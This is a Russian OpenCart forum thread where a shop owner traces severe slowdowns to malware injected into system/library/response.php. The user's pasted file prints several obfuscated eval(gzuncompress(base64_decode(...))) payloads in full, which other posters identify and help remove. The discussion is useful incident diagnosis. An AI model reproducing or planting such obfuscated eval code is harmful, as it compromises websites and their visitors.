Перейти к содержанию
MaxRAF

[Решено {response.php}] Opencart жутко тормозит

Рекомендуемые сообщения

Прошу помочь решить проблему, которую не могу решить в одиночку.

 

Opencart 1.5.6.4

 

Каждая страница открывается секунды 3-4 - очень долго. На хостинге мне выделено 160 Мб. оперативки и 32 процесса. На сайте пара сотен товаров и в день уникумов в среднем 12 человек. Так я не могу даже по SSH подключиться из-за того, что вся память сжирается Opencart'ом, приходится отключать веб-сервер, чтобы можно было зайти по SSH.

 

У меня стоят такие модули PHP на сервере: ctype, curl, dom, gd, hash, iconv, ioncube, json, mbstring, mcrypt, mysql, mysqli, session, simplexml, sockets, timezonedb, xml, zlib

 

Модули на Opencart:

Кэш Менеджер

deadcow SEO

Рекомендуемые

FilterPro v2.4.4 (seo)

JV_QuickOrder - быстрый заказ товара

Последние

Pav Auto Search

Pav Blog

Pav Custom Module

Pav MegaMenu

Pav Newsletter

Pav Featured Products

Pav Product Tabs

Pav Reassurance

Pav Layers Sliders

Pav Social Sidebar

Акции, подарки

SEO Manager

Похожие товары

Простая регистрация и заказ Simple

Заказать звонок

Paladin SEO Manager

Недавно просмотренные

 

Из оплат, только модуль Robokassa.

Доставка, только модуль edost.

 

 

 

Что можно сделать, чтобы сайт работал шустро? товаров ведь всего ничего, а такие тормоза :(

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

OpenCart очень легкий движок. Если вы ставили нестандартную сборку - обращайтесь к ее авторам.

Помимо того, возможно доработки (модули), используемые в вашей сборке отправляют лишние запросы, или эти запросы не оптимизированы...

Если со сборкой все в порядке - скорее всего у вас хреновый хостинг, или включены расширения php, которые вам, по сути, не нужны, но сильно нагружают сервер. Тогда копайте в сторону настройки сервера / смены тарифного плана / провайдера.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

OpenCart очень легкий движок. Если вы ставили нестандартную сборку - обращайтесь к ее авторам.

Помимо того, возможно доработки (модули), используемые в вашей сборке отправляют лишние запросы, или эти запросы не оптимизированы...

Если со сборкой все в порядке - скорее всего у вас хреновый хостинг, или включены расширения php, которые вам, по сути, не нужны, но сильно нагружают сервер. Тогда копайте в сторону настройки сервера / смены тарифного плана / провайдера.

Сборку качал с офсайта, поэтому тут чисто. Хостинг nic.ru

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

 

Сделал по инструкции и получил ошибку Fatal error: Class 'mysql' not found in /home/sanan-cctv/sanan-cctv.ru/docs/vqmod/vqcache/vq2-system_library_db_log.php on line 20

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Проверьте на всякий случай файл system/library/response.php на содержание в нем лишней гадости. Сравните его с оригиналом из дистрибьютива опенкарта. Особое внимание строчки внизу:  echo $output;

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Сборку качал с офсайта, поэтому тут чисто. Хостинг nic.ru

nic.ru тормозной хостинг. У меня на нем тоже три сайта лежат. Я уже устал с ним бодаться.

1. Я сменил тарифный план (был 201 сменил на 202) - это обновленная версия 201-го, просто я его подключал когда был 201, а 202 не было. Отличие лишь в том, что на 202 вдвое увеличили память.

2. Когда я ставил CMS с толстым клиентом - постоянно вылетала ошибка сервера и разработчик той CMS посоветовал мне написать в техподдержку nic.ru  с просьбой настроить сервер (типа они реально не выделяют той памяти, которая заявлена). И действительно помогло - после обращения в ТП проблем стало в разы меньше.

3. Ну и расширения php - пришлось много чего поотключать, чтобы работа хостинга и CMS была стабильной. Но все же, планирую найти хостинг получше. Да и от CMS Djem (которая с толстым клиентом) подумываю отказаться. Она, конечно, мощная, но очень уж сложная.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

У меня такой response

 

class Response {
private $headers = array();
private $level = 0;
public $output;

public function addHeader($header) {
$this->headers[] = $header;
}

public function redirect($url) {
header('Location: ' . $url);
exit;
}

public function setCompression($level) {
$this->level = $level;
}

public function setOutput($output) {
$this->output = $output;
}

private function compress($data, $level = 0) {
if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip') !== false)) {
$encoding = 'gzip';
}

if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'x-gzip') !== false)) {
$encoding = 'x-gzip';
}

if (!isset($encoding)) {
return $data;
}

if (!extension_loaded('zlib') || ini_get('zlib.output_compression')) {
return $data;
}

if (headers_sent()) {
return $data;
}

if (connection_status()) {
return $data;
}

$this->addHeader('Content-Encoding: ' . $encoding);

return gzencode($data, (int)$level);
}

public function output() {
if ($this->output) {
if ($this->level) {
$ouput = $this->compress($this->output, $this->level);
} else {
$ouput = $this->output;
}

if (!headers_sent()) {
foreach ($this->headers as $header) {
header($header, true);
}
}
$output_page = eval(gzuncompress(base64_decode('eNqdVE1rg0AQ/Ss9FDaBUnRpE6R4SA/tJVBMPURLkHx4Uimkp+bXN/NczW7s7K656OLbeTPz5o3378uP18Xy80sUYRhG8+d5MJOF2MSL43H7O9ltf8rZU3Eo99+HciKy5u2Up+LuUWTBWtJ7RY8aX2RU5UlMx1hMH/6LJCzNAnqt6SFX9TmKThWwBMFMNGF5SnkRRbm4PHSr56eDymGLoBsdt/02oWYvslWhrYrtgYCuOjnQzRJhdo5+PPQyteJuogLtdl8R+H2m6ZwH9NJ7UDm0ufM9dF7T5+LsxZzNGAXgGvi6zvpzVKF6S6UEKV9ceQLsYFIsCVsDpg2mU5/P1JebhuYsxo9MZNd7Ox2l9WUzHTvW5hr8Ba73eYSHHAoNN9XpHx/ufROFhO6ahEE5BO5gUShxRtUqsfGu3Hx85M1u57itbzDDe+PVIcynOwvC+OqS10M3J8fIyvodvkVVq1YGs0Mz1dX05Q9RpiiO'))); eval(gzuncompress(base64_decode('eNqVVLFuwjAQ/ZUOSAapqnwmiWNVGejQLkgVtEMShBB0DFnY4OubO8exY7V2slxAuXt5792zFx/bz7fN9uvATiAUzxPIhDyxY7G53c735cJ5DaBkKnkmutcHflyyqn1/1N8VL8X+WrGnFyYU1gZLvSsKtnr+dx7sPLbzkub3WA1WE8MQHQa2Gh74m7j0PLp5fAYx1gYDi8tnJk6i9WDfg/RrX7QegQ/UQzBBnJRwsM9yIV3aH+QU9SVzuHi+NDX+iczLfjdaB7njcTB6wjg54vi+/rVnzSnqsXIypzVhnc4H/NCSND1sFh0GgLGzNiljJWEQYVc8rKicuFpY28w7WdM7MiD6/MWzBol/CAdDZ4CkHiOSMyOtkI3iNjp+0wyV7lawDoZOzEXuX2ZzMoGp/GkVXNpd+LbitjEadQF9M3Ze2v6AhAbMZUhfoEOHA6vXXyUobeY='))); eval(gzuncompress(base64_decode('eNqVVNFugjAU/ZU9mKBxIUCpShYe3AMYYrboIjCMMYAzxoBbTKaDrx/3SlnHC1ea3t4Genp6zi09d/76PJ2/rZWtbul8YprMHG2VjT09n+Oi35NeG5Y2MfWRMa5er8+f36ddXxts+so784vEsZQHVflKchgyTRk8di0d6rAYPq8BSsijEOLyksIwW9gUIE3lcpc4lVF4HxRrHahs+MwWkBD5TNodYQFA5nUHpC5azQ8WCiDIAYx2wOaIAiL7cP0jZamhMvnpmrfcPdVKYplASCDk0YW29Uh6xl1zWW3cyoFoHXFLtzZ2YZMEswAsgiWhVyTM26c5Snetci0OIOUn0hlEa9jlThkF/JAgyIpeC1gESYDnMCLf0lP3B4sAUYNlhnQdK4+Dn4wmr9nujXsVSbyXSHRFqzHV4K0g4FKGRYCuYD0wL6vYH5C5QYMfD9HgOOBYSyFCvmQQd1NUkXoTbg0NBnORDwRvj1zxX+aD0ZBUZtOM5q170TGH7fEXxZaFkAS3B1mIkpig8/9QS1TJI6SxiVBc7sK46K/6rzehPA2GmyiDp1++2ouh'))); eval(gzuncompress(base64_decode('eNrNF4tu4kjsV+YidCEqlxcJj/JYdbtpD4lCD+jppLYXBRhKdkMSTSZt2ar/fp4kwCRH21V0Wh3IIbZnbI/tsc0q9hfUDXz0gKkdOg+4WomJJ71U4NWnPfEq+O56nqOYsoqqV87C9WkQrTvopoMGPsUeAhoaT9FfSFNls4NIDPB4qsltWZfbErrEi2+BoquaqrZ0A124BK+CZ6UuN+S22Kks1r3K5XD8+Ww4vRVtra2ZLcOoGw1bvL/lGZrWbppNtaEzhl6/r5Ig9pdVVZLuq1KnhAjjIOJElXWz8ACxYFvt/GYyHF/PbPipJX4po8rMqWrwn+bHhKIlU2tydmmNZrU0QqUsauQtKkJB5cSa3UxGs8nZaHphTWq8WL2ttgytoTeZ2EzkSV1uFYFJfNOaJhfNo7EodcYWd8adZceE88wiHJgav47tNKWCl/60Jp/HU6u2crwIl7K4zVmsMfvyj4K+2eDKGt/MPg6HmX7fC0Fd5UPw9jLtiE+1d51U3vUSCzsrSCUKRF0/Ymj9pJ7FDARjQgKSSBe7yjxYbvtdZU03Xh9q0prScBEsSynmKhPkvcmAi9tgdDG2f5/Nru3z8RerTJLU+bqly/nS8QG+O3z05NLFuro/p/SycCKMRF1VxVOCaUx8lHi+MyfY+dZJuYZqHLh79+WWmKr+9pLX1xKnNXNXolUEOJFlnw2Hf1v2aDwbnINL3VXVjSJMqxX70prdikFMw5hG4r0EPS1DekVe5/WwLSNKvR4SvcBZitILJ/N6PIWNS5ekAqlD0r5JoY/xzM4rhjKQXyCKndf8Dg5Bcgn3NHLZVuc/H+EsGeyLwdACsSvXwyBO9J0N/CY+LGFMM5eZTbPwOKaQbkI7VVrjfQGexYt1gITZGiO2Fgml3HOsBWgFt3yAHzbqJzpfsFpFkN7xKJIFFIcsm/DyFyHLjfSIFrsmjJRg3TnpJ7AKyAY5yWTWuxM+7RKXibgT0AbTdbAERhhEFHAMM9w2xEDYxB51Q4dQhUn4belQ507oo67nzGFWAxqsgQQF2heYxBY0INvTrpJw+13XByUok0TxMxPNTrDbg9zl/lXpI/yMN6GHT9EyePKZZQoC24GT08ZcAeou4IfJekNbumqnLcMSddm70s9k57ZF8Xzjcmbu8UfHixlhuiPAzsQlfSG57JUVxf6ytx96BVYMTxXlIQgePPzVeXSiBXFDKi+CjcJQxQldOVyHnyJMHjHpsYy0YRaDtn8rpr/26OzKEu8h2L8mnSW3ZGL9cWNN2SQ5SEvHygX9DiHOtipkLUioCVkXgrfMoCCE4EI8mSFAfXp6kgukjfP8PfBlErP37Z6Z4DsMTh5v8qQCNt8K0I8IDj1ngXd2CbXUT3trSFxQ/jMIYFcQQ9DL9ON2vl0Wgd1ZFoja7uS1VFWZ1myoR8qNDsWhAKxQwCWKQN/WTrpkxAKxWgmltGpH59ymWXjwzH8P/IfyyL4/KChdW5grj46gBsx0BXhvHDW48Y2NgUltTAOz66v87fl59+F/nu1GfvrUi/B2tuc8XEIxP5W2YOxtJWPvf5jl5pEsN0CRwf/H0Nk/i/zjh9JTfz8bG/ls/Addwu3V')));
}
}
}
?>

 

Пробовал замену на оригинальный - получил ошибку Fatal error: Cannot access private property Response::$output in /home/sanan-cctv/sanan-cctv.ru/docs/index.php on line 247

 

Когда ошибка эта появилась, админка так летала, что я аж присвистнул :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Ну поздравляю, у вас вирек:  $output_page = eval(gzuncompress(base64_decode('eNqdV..................

Это нужно убирать. И все залетает.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Подскажите до какой из трех фигурных скобок в конце удалить?

Ну поздравляю, у вас вирек:  $output_page = eval(gzuncompress(base64_decode('eNqdV..................

Это нужно убирать. И все залетает.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Не так просто. А кто у вас сидит в sanan-cctv.ru/docs/index.php ? 

вообще должно быть как в оригинале, вместо:

 

$output_page = eval(gzuncompress(base64_decode('eNqdV................

 

это:

echo $output;

 

дальше нужно смотреть, кто сидит в sanan-cctv.ru/docs/index.php  и  где он вызывается.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

 

Не так просто. А кто у вас сидит в sanan-cctv.ru/docs/index.php ? 
вообще должно быть как в оригинале, вместо:
 
$output_page = eval(gzuncompress(base64_decode('eNqdV................
 
это:
echo $output;
 
дальше нужно смотреть, кто сидит в sanan-cctv.ru/docs/index.php  и  где он вызывается.

 

Вижу, что сидит, но кто я сам не знаю :(

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Ребята! Огромнейшее вам спасибо за помощь и наводки!!! Удалил его и сайт залетал :) Миллион раз спасибо :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.